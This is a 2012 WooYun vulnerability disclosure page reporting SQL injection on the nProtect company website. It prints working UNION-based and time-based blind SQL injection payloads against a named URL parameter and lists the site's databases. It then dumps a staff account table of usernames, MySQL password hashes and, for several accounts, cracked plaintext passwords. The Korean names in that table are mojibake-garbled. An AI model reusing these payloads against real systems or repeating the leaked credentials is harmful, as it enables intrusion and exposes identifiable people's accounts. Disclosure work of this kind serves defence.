当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-012034

漏洞标题:nProtect.com 官网存在SQL注射漏洞

相关厂商:nProtect

漏洞作者: 教主

提交时间:2012-09-11 18:39

修复时间:2012-09-11 18:39

公开时间:2012-09-11 18:39

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-09-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-09-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

nProtect 产品有:nProtect GameGuard 和 Anti-Virus.其中 nProtect GameGuard 是非常广泛应用的游戏保护系统。具有防外挂、防盗号等功能。也许可以让游戏启动时更新木马文件。

详细说明:

就是SQL注射嘛。有什么好讲的~

Place: GET
Parameter: no
    Type: UNION query
    Title: MySQL UNION query (NULL) - 12 columns
    Payload: mode=vaccine_view&subpage=4&no=293 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a646b633a,0x66504946797544685262,0x3a6762703a), NULL, NULL, NULL, NULL, NULL, NULL#&page=2&field=&field_value=
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: mode=vaccine_view&subpage=4&no=293 AND SLEEP(5)&page=2&field=&field_value=
---
available databases [15]:
[*] defenstick
[*] eng_db
[*] faq
[*] homeDB
[*] inca_home
[*] information_schema
[*] mysql
[*] nprotect_manager
[*] nprotect_stats
[*] nsc
[*] page_log
[*] service
[*] SMB
[*] STATISTICS
[*] test

漏洞证明:

member_id,member_pw,member_team,member_name,member_position
choihk,*9E48EED2D62CADCAC04211F84D50D619C33237E4 (9600),0137,斓滍槃攴?0139
yjo,*AB6883620813DC2516BE1C5F5847D51078787A0A (1112),<blank>,鞓れ棸歆?0179
lkh,*0FFA4AF1460EB2A79D58F12D48431800842277A2 (0808),<blank>,鞚搓磻頋?0180
ojs,*81CD330F72C934C3C857CA31384939F43A20B90D (9999),<blank>,鞓れ靾?0178
hhlee,*30667F97C9B42FAF755D7FD520A3893B8A267691,<blank>,鞚错槃頋?0178
inca00,*5C65371FF64F0E78A7A51C52C77D73B53E2F1CB6,<blank>,順勳劚鞎?0179
jinisuno,*23AE809DDACAF96AF0FD78ED04B6A265E05AA257 (123),<blank>,鞚挫劆順?0179
dhlee,*90AFC61E5C80C02BAB4C0AE5C190EA22DE7F0B24,<blank>,鞚措彊順?0176
hjung,*F46A6FB37DD0177AE4F5AD25DEB0303BE9420D68,<blank>,鞝曧泩,0178
jyh,*68FF788913FDE3A59FF17846C6FE2C438E33C1A7,<blank>,欤检榿頋?0139
ytkang,*0DE7898DED55349FE79BCEA99AF2178CAB5EFB5D,<blank>,臧曥棸韮?0179
goojabum,*4BBD81F4555290E2BF17096655A03EDD64B76D8B,<blank>,甑瀽氩?0178
hsshin,*23AE809DDACAF96AF0FD78ED04B6A265E05AA257 (123),<blank>,鞁犿潿靹?0179
choidk,*23AE809DDACAF96AF0FD78ED04B6A265E05AA257 (123),<blank>,斓滊彊甓?0180
bskim,*23AE809DDACAF96AF0FD78ED04B6A265E05AA257 (123),<blank>,旯€氤戩劖,0177
smyu,*23AE809DDACAF96AF0FD78ED04B6A265E05AA257 (123),<blank>,鞙犾姽氙?0180
game,*D6CFF1435802A091D736CCC683FE9050E1361A37 (game),<blank>,<blank>,<blank>
chmun,*512D0C4F790A7C919949B08E9973FCDD5195435F,<blank>,氍胳順?<blank>
ihyoocs,*23AE809DDACAF96AF0FD78ED04B6A265E05AA257 (123),<blank>,鞙犾澑順?0179
hrchu,*23AE809DDACAF96AF0FD78ED04B6A265E05AA257 (123),<blank>,欤检劀鞙?0180
hheeyoun,*23AE809DDACAF96AF0FD78ED04B6A265E05AA257 (123),<blank>,頃滍潿鞐?0180
mkjang,*23AE809DDACAF96AF0FD78ED04B6A265E05AA257 (123),<blank>,鞛ル瓴?0180
parkjk,*23AE809DDACAF96AF0FD78ED04B6A265E05AA257 (123),<blank>,氚曥爼攴?0180
analyzer,*7275928CF77E25BDACEDA9B1EC4B115ADF040035,<blank>,旯€鞀轨柛,0179
ratm8731,*88B2A5530578A97E8F20751B9A82725B5AFB7358 (pantera),<blank>,瓿奠攴?0179
mayrain,*5A16E92B52E4F87A2A88ED9B0508E90A11B4526E,<blank>,氚曧槃,0179
jhshin,*1CC6A155248E468C0D17CBC9C511E7823A269464,<blank>,鞁犾頉?0176
jy,*F337D98B7FC03A22DDE19392E2C46C1353DB0C69 (1qaz),<blank>,鞛レ灛鞓?<blank>
bdkim,*D0FE69064D1A232FBFB9ABFB8FBF2A4EE992050D (8541),<blank>,旯€氤戨張,0177
kckim,*66090900C3F0ACD2138A93BD2BF0FF9DDBC961E2,<blank>,旯€旮办矤,0178
ujin,*879E95DF4A5C5718156FCF7A90F8F9ED9B7D24CA,<blank>,鞚挫湢歆?<blank>
incagsc,*DBBCE7429018341E397DF4E6948A7AA6AA86757C,<blank>,鞚错樃鞓?<blank>
ejpark,*23AE809DDACAF96AF0FD78ED04B6A265E05AA257 (123),<blank>,氚曥潃鞝?<blank>
sklee,*00A51F3F48415C7D4E8908980D443C29C69B60C9 (12345),<blank>,鞚挫劆瓴?0180
dev_nosa ,*00E18CC7C2A0D72CC3F598CE418967D662FC8124,<blank>,氚办儊靾?0179
seogh,*C1F95F0645932E4F40BE47A4B33E8B45FBD629E3,<blank>,靹滉磻順?<blank>

修复方案:

版权声明:转载请注明来源 教主@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝